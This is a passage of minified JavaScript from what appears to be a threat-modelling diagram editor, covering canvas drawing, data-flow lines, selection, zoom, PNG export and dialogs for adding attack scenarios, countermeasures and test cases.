FontSizeConfigIndex(e){this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX,String(e)),this.changeFontSize()}get ObjectCountToInit(){if(!this.Diagram.Elements)return"";let e=this.Diagram.Elements.GetChildrenFlat().filter(i=>!i.UserCheckedElement).length;return e>0?e.toString():""}get IsCreatingFlow(){return null!=this.tmpFlowLine}get IsObjectSelected(){var e;return(null===(e=this.Canvas)||void 0===e?void 0:e.getActiveObjects().length)>0}get SelectedElement(){var e;let i=null===(e=this.Canvas)||void 0===e?void 0:e.getActiveObjects();if(1==(null==i?void 0:i.length)){if(i[0][ot.ID])return this.getViewBaseElement(this.Canvas.getActiveObject()[ot.ID]);if(i[0][ot.flowID])return this.getViewBaseElement(this.getCanvasElementByCanvasID(i[0][ot.flowID])[ot.ID])}return null}set SelectedElement(e){if(!this.Canvas||this.MouseMode==Zs.Move||this.blockSelectionChangedAfterSend)return;this.blockSelectionChangedAfterReceive=!0,setTimeout(()=>{this.blockSelectionChangedAfterReceive=!1},250);let i=this.Canvas.getActiveObject();if(i&&i[ot.ID]==(null==e?void 0:e.ID))return;if(null==e&&this.SelectedElement)return this.Canvas.discardActiveObject(),void this.onCanvasModified();this.Canvas.discardActiveObject();let n=this.Canvas.getObjects();try{let r=n.find(c=>c[ot.ID]==e.ID);this.Canvas.setActiveObject(r),r[ot.elementTypeID]==Et.DataFlow&&this.setFlowSelected(r,!0)}catch(r){}this.Canvas.renderAll()}SetMouse(){this.MouseMode=Zs.Mouse}SetPan(){this.MouseMode=Zs.Pan}SetMove(){this.MouseMode=Zs.Move}Save(){this.ToJSONString()}TextIncrease(){const e=this.getCanvasElementByID(this.SelectedElement.ID);let i=null,n=null,r=null;e._objects?(i=e._objects.find(d=>d[ot.myType]==wt.ElementType),r=e._objects.find(d=>d[ot.myType]==wt.ElementPhyElement),n=e._objects.find(d=>d[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID]));let c=null;i?c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Type==i[ot.fontSize])+1]:n&&(c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Name==n[ot.fontSize])+1]),c&&(n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?c.Name:c.Type),i&&i.set(ot.fontSize,c.Type),r&&r.set(ot.fontSize,c.Type),this.Canvas.requestRenderAll(),this.onCanvasModified())}TextDecrease(){const e=this.getCanvasElementByID(this.SelectedElement.ID);let i=null,n=null,r=null;e._objects?(i=e._objects.find(d=>d[ot.myType]==wt.ElementType),r=e._objects.find(d=>d[ot.myType]==wt.ElementPhyElement),n=e._objects.find(d=>d[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID]));let c=null;i?c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Type==i[ot.fontSize])-1]:n&&(c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Name==n[ot.fontSize])-1]),c&&(n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?c.Name:c.Type),i&&i.set(ot.fontSize,c.Type),r&&r.set(ot.fontSize,c.Type),this.Canvas.requestRenderAll(),this.onCanvasModified())}SendToBack(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.sendToBack(e)),this.SelectedElement=null,this.onCanvasModified()}SendBackwards(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.sendBackwards(e)),this.SelectedElement=null,this.onCanvasModified()}BringForward(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.bringForward(e)),this.onCanvasModified()}BringToFront(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.bringToFront(e)),this.onCanvasModified()}AddAnnotation(){let e=new Ei.fabric.IText("Text Annotation",{left:100,top:40,fill:this.StrokeColor,cavnasID:Fo(),myType:wt.Annotation,fontSize:16,transparentCorners:!0});this.Canvas.add(e),this.onCanvasModified()}SelectNextUninitObject(){let e=this.Diagram.Elements.GetChildrenFlat().filter(n=>!n.UserCheckedElement),i=e[e.length-1];i.UserCheckedElement=!0,this.SelectedElement=i,this.SelectionChanged.emit(i)}AddThreat(){if(this.SelectedElement){let e=this.dataService.Project.CreateAttackScenario(this.Diagram.ID,!1);e.SetMapping("",[],this.SelectedElement,[this.SelectedElement],null,null,null,null),e.IsGenerated=!1,this.dialog.OpenAttackScenarioDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteAttackScenario(e)})}}AddTestCase(){if(this.SelectedElement){const e=this.dataService.Project.CreateTestCase();e.AddLinkedElement(this.SelectedElement),this.dialog.OpenTestCaseDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteTestCase(e)})}}AddCountermeasure(){if(this.SelectedElement){let e=this.dataService.Project.CreateCountermeasure(this.Diagram.ID,!1);e.SetMapping(null,[this.SelectedElement],[]),this.dialog.OpenCountermeasureDialog(e,!0,this.Diagram.Elements.GetChildrenFlat()).subscribe(i=>{i||this.dataService.Project.DeleteCountermeasure(e)})}}CancelCreateFlow(){this.tmpFlowLine&&(this.Canvas.remove(this.tmpFlowLine),this.tmpFlowLine=null)}SetZoom(e,i=null,n=null){i&&n?this.Canvas.zoomToPoint({x:i,y:n},e):this.Canvas.setZoom(e)}OnResized(e,i,n=!0){if(this.initializeCanvas(i),this.Canvas){const r=this.getCanvasSize();if(this.CanvasScreenWidth=e.newRect.width,this.CanvasScreenHeight=e.newRect.height-5,n){const d=e.newRect.height>r[3]?e.newRect.height:r[3];this.Canvas.setWidth(e.newRect.width>r[2]?e.newRect.width:r[2]),this.Canvas.setHeight(d-5)}else this.Canvas.setWidth(e.newRect.width),this.Canvas.setHeight(e.newRect.height-5);this.Canvas.renderAll()}}OnOuterCanvasMouseDown(e){4==e.buttons&&(this.MouseMode=Zs.Pan,this.Canvas.lastPosX=e.clientX,this.Canvas.lastPosY=e.clientY)}OnOuterCanvasMouseUp(e){this.MouseMode==Zs.Pan&&(this.MouseMode=Zs.Mouse)}OnDeleteElement(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&this.deleteElement(e.ID)})}ToJSONString(e=!1){let i=JSON.stringify(this.Canvas.toJSON(Object.keys(ot).filter(n=>"string"==typeof n)),null,e?2:0);return this.Diagram.Canvas=i,i}FromJSONString(e){this.Canvas.loadFromJSON(JSON.parse(e),i=>{null!=i?console.error(i):(this.Diagram.Canvas=e,this.onFromJSONString())})}GetImage(){return this.Canvas.toDataURL({format:"image/png"})}SaveImage(){const e=as.FromJSON(JSON.parse(JSON.stringify(this.Diagram.ToJSON())),this.dataService.Project,this.dataService.Project.Config),i=1500,r=document.createElement("div");r.style.width=i.toString()+"px",r.style.height=750..toString()+"px",r.style.pointerEvents="none";let d,c=new xb(new DOMRectReadOnly(0,0,i,750),null);d=e instanceof b2?new R7(e,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,e.IsUseCaseDiagram?aa.UseCase:aa.Context):new $T(e,this.dataService,this.theme,this.dialog,this.locStorage,this.translate),d.OnResized(c,r),d.PrintMode(this.SaveImageWithGrid);const T=d.FitToCanvas(i);c=new xb(new DOMRectReadOnly(0,0,1510,T[1]+10),null),r.style.height=T[1].toString()+"px",d.OnResized(c,r,!1);const k=window.open(),q=new Image;q.onload=()=>{k.document.body.append(q),this.theme.IsDarkMode&&d.SetColors(!0)},q.src=d.GetImage();const Y=document.createElement("a");document.body.appendChild(Y),Y.href=q.src,Y.target="_self",Y.download=this.Diagram.Name+".png",Y.click(),document.body.removeChild(Y)}SetColors(e){this.isDarkMode=e,e?(this.StrokeColor="white",this.BackgroundColor=t.BackgroundColorDark):(this.StrokeColor="black",this.BackgroundColor=t.BackgroundColorLight),this.setCanvasColor()}PrintMode(e){this.SetColors(!1);const i=c=>{if(c.stroke&&c.stroke==this.theme.Primary&&c.set("stroke",this.StrokeColor),c.fill&&c.fill==this.theme.Primary){let d="";"white"==c.fill?d="black":"black"==c.fill||"rgb(0,0,0)"==c.fill?d="white":"transparent"==c.fill?d=c.fill:c.fill==t.BackgroundColorDark?d=t.BackgroundColorLight:c.fill==t.BackgroundColorLight?d=t.BackgroundColorDark:c.fill==this.theme.Primary&&(d=this.theme.Primary),c.set("fill",d)}if(c.cornerColor&&c.cornerColor==this.theme.Primary){let d="";"transparent"==c.cornerColor?d="transparent":"white"==c.cornerColor?d="black":"black"==c.cornerColor&&(d="white"),c.set("cornerColor",d)}},r=c=>{c.forEach(d=>{i(d),(c=>{c[ot.myType]==wt.GridLine&&(c[ot.visible]=e)})(d),d._objects&&r(d._objects)})};r(this.Canvas.getObjects())}FitToCanvas(e,i=0){const n=this.getCanvasSize();let r=n[0],c=n[1],d=n[2],T=n[3],k=this.Canvas.viewportTransform;k[4]=-r,k[5]=-c;let q=e/(d-r),Y=(T-c)*q;if(i>0&&Y>i){const te=i/Y;q*=te,e*=te,Y*=te}return this.Canvas.setZoom(q),this.Canvas.requestRenderAll(),[e,Y]}initializeCanvas(e){if(this.isInitalized)return!1;this.isInitalized=!0;let i=document.createElement("canvas");i.style.marginTop="1px",e.appendChild(i),this.Canvas=new Ei.fabric.Canvas(i),this.Canvas.selection=!1,this.Canvas.selectionFullyContained=!0,this.Canvas.targetFindTolerance=2,this.Canvas.uniformScaling=!1,this.Canvas.setWidth(e.clientWidth),this.CanvasScreenWidth=e.clientWidth,this.CanvasScreenHeight=e.clientHeight-5,this.Canvas.setHeight(e.clientHeight-5),this.SetColors(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(c=>{this.SetColors(c)}),Ei.fabric.Object.prototype.transparentCorners=!1,Ei.fabric.Object.prototype.cornerColor=this.StrokeColor,Ei.fabric.Object.prototype.cornerStyle="circle",Ei.fabric.Object.prototype.controls.deleteControl=new Ei.fabric.Control({x:.5,y:-.5,offsetX:0,offsetY:0,cursorStyle:"pointer",mouseUpHandler:(c,d)=>{let T=null;if(d.target[ot.ID]&&d.target[ot.elementTypeID]!=Et.DataFlow)T=this.getViewBaseElement(d.target[ot.ID]);else if(d.target[ot.elementTypeID]==Et.DataFlow||d.target[ot.flowID]){let k=d.target[ot.elementTypeID]==Et.DataFlow?d.target:this.getCanvasElementByCanvasID(d.target[ot.flowID]);T=this.getViewBaseElement(k[ot.ID])}T&&T.ID!=this.Diagram.Elements.ID?this.OnDeleteElement(T):this.Canvas.remove(d.target),this.Canvas.requestRenderAll()},render:this.renderIcon}),Ei.fabric.Canvas.prototype.getAbsoluteCoords=function(c){return{left:c.left+this._offset.left,top:c.top+this._offset.top}},document.onkeydown=c=>{"Escape"==c.key&&this.CancelCreateFlow()},this.Canvas.on("mouse:wheel",c=>this.onCanvasMouseWheel(c)),this.Canvas.on("mouse:move",c=>this.onCanvasMouseMove(c)),this.Canvas.on("mouse:down",c=>this.onCanvasMouseDown(c)),this.Canvas.on("mouse:up",c=>this.onCanvasMouseUp(c)),this.Canvas.on("mouse:over",c=>this.onCanvasMouseOver(c)),this.Canvas.on("mouse:out",c=>this.onCanvasMouseOut(c)),this.Canvas.on("drop",c=>this.onCanvasDrop(c)),this.Canvas.on("object:modified",c=>this.onCanvasModified()),this.Canvas.on("object:moving",c=>this.onCanvasObjectMoving(c)),this.Canvas.on("object:scaling",c=>{this.blockCheckingIntersection=!0}),this.Canvas.on("selection:updated",c=>this.onCanvasSelectionChanged(c)),this.Canvas.on("selection:created",c=>this.onCanvasSelectionChanged(c)),this.Canvas.on("selection:cleared",c=>this.onCanvasSelectionChanged(c)),this.Diagram.Elements.GetChildrenFlat().forEach(c=>{c.NameChanged.subscribe(d=>this.changeObjectName(c.ID)),c.OutOfScopeChanged.subscribe(d=>this.changeObjectBorder(c.ID)),c instanceof lc?(c.TypeChanged.subscribe(d=>this.changeObjectType(c.ID,d.Name)),c.PhysicalElementChanged.subscribe(d=>this.changeObjectPhysicalElement(c.ID,d))):c instanceof ns&&c.TypeChanged.subscribe(d=>this.changeObjectType(c.ID,nM.ToString(d)))}),this.Diagram.Canvas&&this.FromJSONString(this.Diagram.Canvas);const n=3e3;for(let c=-n;c<n;c+=t.GridSize)this.Canvas.add(new Ei.fabric.Line([c,-n,c,n],{stroke:this.StrokeColor,selectable:!1,evented:!1,myType:wt.GridLine,opacity:.07,visible:this.ShowGrid})),this.Canvas.add(new Ei.fabric.Line([-n,c,n,c],{stroke:this.StrokeColor,selectable:!1,evented:!1,myType:wt.GridLine,opacity:.07,visible:this.ShowGrid}));this.Canvas.getObjects().filter(c=>c[ot.myType]==wt.GridLine).forEach(c=>this.Canvas.sendToBack(c));const r=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ZOOM);return null!=r&&this.SetZoom(Number(r)),!0}onFromJSONString(){this.setCanvasColor();let e=[],i=[];const n=(r,c,d)=>{let k=new Ei.fabric.Circle({left:r,top:c,radius:6.5,fill:this.StrokeColor,opacity:.15});const q=r+6.5,Y=c+6.5,te=4.33;let pe=new Ei.fabric.Line([q-te,Y-te,q+te,Y+te],{stroke:this.theme.Primary,selectable:!1}),Re=new Ei.fabric.Line([q-te,Y+te,q+te,Y-te],{stroke:this.theme.Primary,selectable:!1});return new Ei.fabric.Group([k,pe,Re],{left:r,top:c,hasControls:!1,hasBorders:!1,lockRotation:!0,opacity:0,fa:d,myType:wt.FlowAnchor,canvasID:Fo()})};this.Canvas.getObjects().forEach(r=>{r._objects&&r._objects.filter(d=>null!=d[ot.fa]).forEach(d=>{if(d._objects){if(r[ot.myType]==wt.Interactor){let T=-6.5,k=-19.29;d[ot.fa]==_i.East?T=19:d[ot.fa]==_i.West?T=-28.5:d[ot.fa]==_i.North?k=-38.79:d[ot.fa]==_i.South&&(k=3.71),d.left=T,d.top=k,d.setCoords()}}else{const T=n(r.left+r.width/2+d.left,r.top+r.height/2+d.top,d[ot.fa]);this.Canvas.add(T);const k=r._objects.indexOf(d);r._objects.splice(k,1),r.addWithUpdate(T),this.Canvas.remove(d),console.log("update flow anchor")}})}),this.Canvas.getObjects().forEach(r=>{var c,d,T,k,q;let Y=null;if(r[ot.ID])Y=this.getViewBaseElement(r[ot.ID]);else if(r[ot.flowID]){let te=this.getCanvasElementByCanvasID(r[ot.flowID]);te&&te[ot.ID]&&(Y=this.getViewBaseElement(te[ot.ID]),Y&&(Y instanceof M2||Y instanceof os)&&(this.subscriptionsLineType.includes(Y.ID)||(null===(c=Y.LineTypeChanged)||void 0===c||c.subscribe(pe=>this.flowChangeLineType(Y.ID,pe)),null===(d=Y.ArrowPosChanged)||void 0===d||d.subscribe(pe=>this.flowUpdateFlowArrow(Y.ID)),null===(T=Y.BendFlowChanged)||void 0===T||T.subscribe(pe=>this.flowChangeBending(Y.ID,pe)),null===(k=Y.DirectionChanged)||void 0===k||k.subscribe(pe=>this.flowChangeDirection(Y.ID)),null===(q=Y.AnchorChanged)||void 0===q||q.subscribe(pe=>this.flowChangeAnchor(Y.ID,pe)),this.subscriptionsLineType.push(Y.ID))))}r._objects&&r._objects.filter(pe=>null!=pe[ot.fa]).forEach(pe=>{this.subscriptionsFlowAnchor.includes(pe[ot.canvasID])||(pe.on("mousedown",Re=>this.onFlowAnchorHit(Re)),this.subscriptionsFlowAnchor.push(pe[ot.canvasID]))}),null!=Y||[wt.Annotation,wt.TextPosPoint].includes(r[ot.myType])?(Y&&this.changeObjectName(Y.ID),r[ot.elementTypeID]==Et.DataFlow?e.push(r):[wt.DataFlowArrowE,wt.DataFlowArrowS].includes(r[ot.myType])&&i.push(r),(!Y||Y&&!this.subscriptionsScaling.includes(Y.ID))&&(this.subscribeScaling(r),Y&&this.subscriptionsScaling.push(Y.ID))):this.Canvas.remove(r)}),i.forEach(r=>{let c="";for(let k=0;k<r.path.length-1;k++)c+=r.path[k].join(" ")+" ";c+="z";let d=new Ei.fabric.Path(c,{objectCaching:!1,originX:"center",originY:"center",selectable:!1});d.setControlsVisibility({mtr:!1,mts:!1}),["fill","stroke","strokeWidth",ot.canvasID,ot.flowID,ot.visible,ot.myType].forEach(k=>{d[k]=r[k]}),this.Canvas.remove(r),this.Canvas.add(d)}),e.forEach(r=>{var c,d,T;let q=r.path[0][2],Y=r.path[1][1],te=r.path[1][2],pe=r.path[1][3],Re=r.path[1][4],Fe=["M",r.path[0][1].toString(),q.toString(),"Q",Y.toString(),te.toString(),pe.toString(),Re.toString()].join(" "),Ne=new Ei.fabric.Path(Fe,{fill:"",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,canvasID:r[ot.canvasID],selectable:!0,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,hasControls:!1,transparentCorners:!0,cornerColor:"transparent",perPixelTargetFind:!0});[ot.ID,ot.elementTypeID,ot.myType,ot.strokeDashArray,ot.arrowEID,ot.arrowSID,ot.textID,ot.bendFlow,ot.p0ID,ot.p1ID,ot.p2ID,ot.fa1,ot.fe1,ot.fa2,ot.fe2,ot.fontSize].forEach(Ze=>{Ne.set(Ze,r[Ze])}),Ne.setControlsVisibility({mtr:!1,mts:!1}),this.Canvas.add(Ne),this.Canvas.remove(r),this.flowUpdateText(Ne),this.flowUpdateFlowArrow(Ne[ot.ID]),null===(c=this.getCanvasElementByCanvasID(Ne[ot.p0ID]))||void 0===c||c.set("opacity",0),null===(d=this.getCanvasElementByCanvasID(Ne[ot.p1ID]))||void 0===d||d.set("opacity",0),null===(T=this.getCanvasElementByCanvasID(Ne[ot.p2ID]))||void 0===T||T.set("opacity",0);let ut=this.getCanvasElementByCanvasID(r[ot.arrowEID]);this.Canvas.bringToFront(ut),ut=this.getCanvasElementByCanvasID(r[ot.arrowSID]),this.Canvas.bringToFront(ut)}),this.Canvas.getObjects().filter(r=>r[ot.myType]==wt.DataFlowCircle).forEach(r=>r.selectable=!1),this.Canvas.getObjects().filter(r=>[Et.LogDataStore,Et.LogProcessing,Et.LogProcessing,Et.LogTrustArea].includes(r[ot.elementTypeID])).forEach(r=>{const c=this.getViewBaseElement(r[ot.ID]);null!=c.PhysicalElement&&this.changeObjectPhysicalElement(r[ot.ID],c.PhysicalElement)}),this.Canvas.getObjects().forEach(r=>{if(r._objects){const c=r._objects.find(d=>d[ot.myType]==wt.ElementType);c&&(c.text=c.text.replace("<<","\xab").replace(">>","\xbb"))}}),this.Canvas.getObjects().forEach(r=>this.fireScaling(r)),this.Canvas.requestRenderAll()}onCanvasModified(){this.checkIntersection(),this.isSaving||(this.isSaving=!0,setTimeout(()=>{this.isSaving=!1,this.Save()},1e3))}onCanvasMouseWheel(e){if(e.e.ctrlKey){let i=e.e.deltaY,n=this.Canvas.getZoom();n*=Math.pow(.999,i),n>3&&(n=3),n<.33&&(n=.33),this.SetZoom(n,e.e.offsetX,e.e.offsetY),e.e.preventDefault(),e.e.stopPropagation()}}onCanvasMouseMove(e){if((1==e.e.buttons||4==e.e.buttons)&&this.Canvas.isDragging){let i=this.Canvas.viewportTransform;i[4]+=e.e.clientX-this.Canvas.lastPosX,i[4]>0&&(i[4]=0),i[5]+=e.e.clientY-this.Canvas.lastPosY,i[5]>0&&(i[5]=0),this.Canvas.requestRenderAll(),this.Canvas.lastPosX=e.e.clientX,this.Canvas.lastPosY=e.e.clientY}this.tmpFlowLine&&(this.tmpFlowLine.set({x2:e.absolutePointer.x,y2:e.absolutePointer.y}),this.tmpFlowLine.setCoords(),this.Canvas.requestRenderAll())}onCanvasMouseDown(e){this.Canvas.isDragging&&(this.Canvas.lastPosX=e.e.clientX,this.Canvas.lastPosY=e.e.clientY)}onCanvasMouseUp(e){var i;if(this.Canvas.setViewportTransform(this.Canvas.viewportTransform),this.MouseMode==Zs.Pan)this.SetMouse();else if(this.MouseMode==Zs.Mouse){let n=this.blockCheckingIntersection;this.blockCheckingIntersection=!1,n&&this.checkIntersection(),(null===(i=e.transform)||void 0===i?void 0:i.target)&&e.transform.target[ot.ID]&&!this.blockSelectionChangedAfterSend&&!this.blockCheckingIntersection&&this.getViewBaseElement(e.transform.target[ot.ID])==this.SelectedElement&&(this.instanceOfContainer(this.SelectedElement)&&this.SendToBack(),this.SelectionChanged.emit(null))}}onCanvasMouseOver(e){if(e.target){if(e.target._objects){let i=e.target,n=e.target._objects.filter(r=>ot.fa in r);if(e.target[ot.myType]==wt.FlowAnchor&&(n=e.target.group._objects.filter(r=>ot.fa in r),i=e.target.group),n.length>0){const r=this.overTimeoutBuffer[i[ot.canvasID]];r&&(clearTimeout(r),delete this.overTimeoutBuffer[i[ot.canvasID]]),n.forEach(c=>{c.set(ot.opacity,1),this.Canvas.bringToFront(c)}),this.Canvas.requestRenderAll()}}null!=e.target[ot.t0ID]&&(this.getCanvasElementByCanvasID(e.target[ot.t0ID]).set(ot.opacity,1),this.Canvas.requestRenderAll())}}onCanvasMouseOut(e){if(e.target){if(e.target._objects){let i=e.target,n=e.target._objects.filter(r=>ot.fa in r);e.target[ot.myType]==wt.FlowAnchor&&(n=e.target.group._objects.filter(r=>ot.fa in r),i=e.target.group),n.length>0&&null==this.overTimeoutBuffer[i[ot.canvasID]]&&(this.overTimeoutBuffer[i[ot.canvasID]]=setTimeout(()=>{n.forEach(r=>{r.set(ot.opacity,0)}),delete this.overTimeoutBuffer[i[ot.canvasID]],this.Canvas.requestRenderAll()},500))}if(null!=e.target[ot.t0ID]){let i=this.getCanvasElementByCanvasID(e.target[ot.t0ID]);setTimeout(()=>{i.set(ot.opacity,0),this.Canvas.requestRenderAll()},1500)}}}arrowVisibilityStore(){this.arrowVisibilityBuffer={},this.Canvas.getObjects().filter(e=>[wt.DataFlowArrowE,wt.DataFlowArrowS].includes(e[ot.myType])).forEach(e=>{this.arrowVisibilityBuffer[e[ot.canvasID]]=e[ot.visible],e.set(ot.visible,!1),e.set("dirty",!0)}),this.Canvas.requestRenderAll()}arrowVisibilityRestore(){Object.keys(this.arrowVisibilityBuffer).forEach(e=>{const i=this.getCanvasElementByCanvasID(e),n=this.arrowVisibilityBuffer[e];i.set(ot.visible,null==n||n)}),this.Canvas.getObjects().forEach(e=>this.onMovingObject(e)),this.Canvas.requestRenderAll()}onCanvasObjectMoving(e){if(this.MouseMode==Zs.Move)return this.mouseMovingState==Cf.Selecting&&(this.arrowVisibilityStore(),this.mouseMovingState=Cf.Moving),void this.Canvas.getObjects().forEach(i=>this.onMovingObject(i));this.onMovingObject(e.target)}onMovingObject(e){if(this.blockCheckingIntersection=!0,["p1"].includes(e[ot.name])?this.dfOnPointMoving(e):e[ot.myType]==wt.TextPosPoint?this.textOnMovingPoint(e):e[ot.t0ID]&&this.textOnMovingText(e),e[ot.ID]){const i=n=>Math.round(n/t.GridSize*2)%2==0;this.ShowGrid&&this.StickToGrid&&(i(e.left)&&e.set("left",Math.round(e.left/t.GridSize)*t.GridSize),i(e.top)&&e.set("top",Math.round(e.top/t.GridSize)*t.GridSize),e.setCoords())}e[ot.dfs]&&e[ot.dfs].forEach(i=>{const n=this.getCanvasElementByCanvasID(i);let r=n[ot.fe2]==e[ot.canvasID],c=this.getFlowAnchorPoint(r?n[ot.fa2]:n[ot.fa1],e),T=this.getCanvasElementByCanvasID(n[r?ot.p2ID:ot.p0ID]);T.left=c[0],T.top=c[1];let k=0,q=0;if(e.group&&(k=e.group.left+e.group.width/2,q=e.group.top+e.group.height/2),r?(n.path[1][3]=k+c[0],n.path[1][4]=q+c[1]):(n.path[0][1]=k+c[0],n.path[0][2]=q+c[1]),0==n[ot.bendFlow]){let pe=this.getCanvasElementByCanvasID(n[ot.p1ID]),Fe=n.path[0][2]+(n.path[1][4]-n.path[0][2])/2;pe.left=n.path[1][1]=n.path[0][1]+(n.path[1][3]-n.path[0][1])/2,pe.top=n.path[1][2]=Fe}let Y=n._calcDimensions();n.set({width:Y.width,height:Y.height,left:Y.left,top:Y.top,pathOffset:{x:Y.width/2+Y.left,y:Y.height/2+Y.top},dirty:!0}),n.setCoords();let te=this.getViewBaseElement(n[ot.ID]);this.flowUpdateFlowArrow(te.ID),this.flowUpdateText(n),this.Canvas.requestRenderAll()}),e[ot.myType]!=wt.GridLine&&(e.left<0&&(e.left=0,this.Canvas.requestRenderAll()),e.top<0&&(e.top=0,this.Canvas.requestRenderAll()),e.left+e.width>this.xMax&&e.left+e.width>this.Canvas.width&&(this.Canvas.setWidth(e.left+e.width),this.Canvas.requestRenderAll()),e.top+e.height>this.yMax&&e.top+e.height>this.Canvas.height&&(this.Canvas.setHeight(e.top+e.height),this.Canvas.requestRenderAll()))}onCanvasSelectionChanged(e){if(this.MouseMode!=Zs.Move){if(!this.blockSelectionChangedAfterReceive){if("selected"in e&&e.selected.length>0)if(1==e.selected.length){let i=e.selected[0];if(i[ot.fa])return void this.Canvas.discardActiveObject();if(i.group&&(i=i.group),i[ot.ID]){let n=this.getViewBaseElement(i[ot.ID]);this.SelectionChanged.emit(n),i[ot.elementTypeID]==Et.DataFlow&&this.setFlowSelected(i,!0)}else if(i[ot.flowID]){let n=this.getCanvasElementByCanvasID(i[ot.flowID]),r=this.getViewBaseElement(n[ot.ID]);this.SelectionChanged.emit(r),this.setFlowSelected(n,!0)}}else console.error("More than one object selected");else"deselected"in e&&(this.setFlowSelected(null,!1),this.SelectionChanged.emit(null));this.blockSelectionChangedAfterSend=!0,setTimeout(()=>{this.blockSelectionChangedAfterSend=!1},250)}}else this.mouseMovingState==Cf.Moving&&(this.SetMouse(),this.mouseMovingState=Cf.None,this.arrowVisibilityRestore())}onCanvasDrop(e){const i=e.e.dataTransfer.getData("dragDropData");if(i){let n=this.Canvas.viewportTransform;this.createElement(JSON.parse(i),(e.e.offsetX-n[4])/n[0],(e.e.offsetY-n[5])/n[0]),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}}onFlowAnchorHit(e){var i,n,r,c,d,T;if(!this.blockCreateLine){let k="",q=null;1==(null===(i=e.subTargets)||void 0===i?void 0:i.length)?(k=e.subTargets[0][ot.fa],q=e.target):(k=e.target[ot.fa],q=e.target.group);let Y=this.getFlowAnchorPoint(k,q);if(null==this.tmpFlowLine)this.tmpFlowLineEndpoint=q,this.tmpFlowLine=new Ei.fabric.Line([Y[0],Y[1],Y[0],Y[1]],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,hasControls:!1}),this.tmpFlowLine[ot.fa1]=k,this.Canvas.add(this.tmpFlowLine),this.Canvas.sendToBack(this.tmpFlowLine);else if(this.tmpFlowLineEndpoint[ot.canvasID]!=q[ot.canvasID]){const te=this.instantiateFlow();if(this.instanceOfCanvasFlow(te)){te.ArrowPos=this.FlowArrowPosition,te.BendFlow=this.BendFlow,te.ShowName=this.ShowName;let pe=this.createFlow(this.tmpFlowLine.x1,this.tmpFlowLine.y1,Y[0],Y[1],te);te.NameChanged.subscribe(Re=>this.changeObjectName(te.ID)),te.OutOfScopeChanged.subscribe(Re=>this.changeObjectBorder(te.ID)),null===(n=te.LineTypeChanged)||void 0===n||n.subscribe(Re=>this.flowChangeLineType(te.ID,Re)),null===(r=te.ArrowPosChanged)||void 0===r||r.subscribe(Re=>this.flowUpdateFlowArrow(te.ID)),null===(c=te.BendFlowChanged)||void 0===c||c.subscribe(Re=>this.flowChangeBending(te.ID,Re)),null===(d=te.DirectionChanged)||void 0===d||d.subscribe(Re=>this.flowChangeDirection(te.ID)),null===(T=te.AnchorChanged)||void 0===T||T.subscribe(Re=>this.flowChangeAnchor(te.ID,Re)),this.Diagram.Elements.AddChild(te),te.Sender=this.getViewBaseElement(this.tmpFlowLineEndpoint[ot.ID]),te.Receiver=this.getViewBaseElement(q[ot.ID]),pe[ot.fa1]=this.tmpFlowLine[ot.fa1],pe[ot.fe1]=this.tmpFlowLineEndpoint[ot.canvasID],this.tmpFlowLineEndpoint[ot.dfs]||(this.tmpFlowLineEndpoint[ot.dfs]=[]),this.tmpFlowLineEndpoint[ot.dfs].push(pe[ot.canvasID]),pe[ot.fa2]=k,pe[ot.fe2]=q[ot.canvasID],q[ot.dfs]||(q[ot.dfs]=[]),q[ot.dfs].push(pe[ot.canvasID]),this.tmpFlowLineEndpoint=null,this.Canvas.remove(this.tmpFlowLine),this.tmpFlowLine=null,this.Canvas.requestRenderAll(),this.setFlowSelected(pe,!0),this.SelectionChanged.emit(te),this.onCanvasModified()}}}}deleteElement(e){if(null==e)return;let i=null,n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n){if((n[ot.elementTypeID]==Et.DataFlow||n[ot.flowID])&&(i=n[ot.elementTypeID]==Et.DataFlow?n:this.getCanvasElementByCanvasID(n[ot.flowID])),i?(this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p0ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p1ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p2ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowEID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowSID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.textID])),this.Canvas.getObjects().filter(c=>null!=c[ot.dfs]).forEach(c=>{const d=c[ot.dfs].indexOf(i[ot.canvasID]);d>=0&&c[ot.dfs].splice(d,1)}),this.Canvas.remove(i)):(n._objects&&n._objects.filter(c=>"group"==c.type).forEach(c=>this.Canvas.remove(c)),this.Canvas.remove(n)),n[ot.t0ID]){const c=this.getCanvasElementByCanvasID(n[ot.t0ID]);c&&this.Canvas.remove(c)}let r=this.getViewBaseElement(e);r&&this.instanceOfElementType(r)&&(r.Parent.DeleteChild(r),this.Canvas.getObjects().filter(c=>c[ot.ID]==e).forEach(c=>{this.Canvas.remove(c),this.Diagram.Elements.DeleteChild(r)})),r instanceof 